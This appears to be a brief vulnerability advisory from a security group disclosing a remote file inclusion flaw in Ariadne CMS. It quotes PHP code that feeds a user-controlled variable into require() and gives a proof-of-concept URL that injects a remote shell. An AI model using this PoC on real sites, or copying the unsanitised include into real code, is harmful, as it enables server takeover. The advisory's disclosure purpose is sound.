Ariadne CMS Remote File Inclusion

A R I A - S E C U R I T Y

Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/

Source Code:

<?php
require("./ariadne.inc");
require($ariadne."/configs/ariadne.phtml");

$PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
<script>
function LoadingDone() {
parent.LoadingDone();
}

PoC:
http://site.com/path/view.php?ariadne=SHELL?

Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info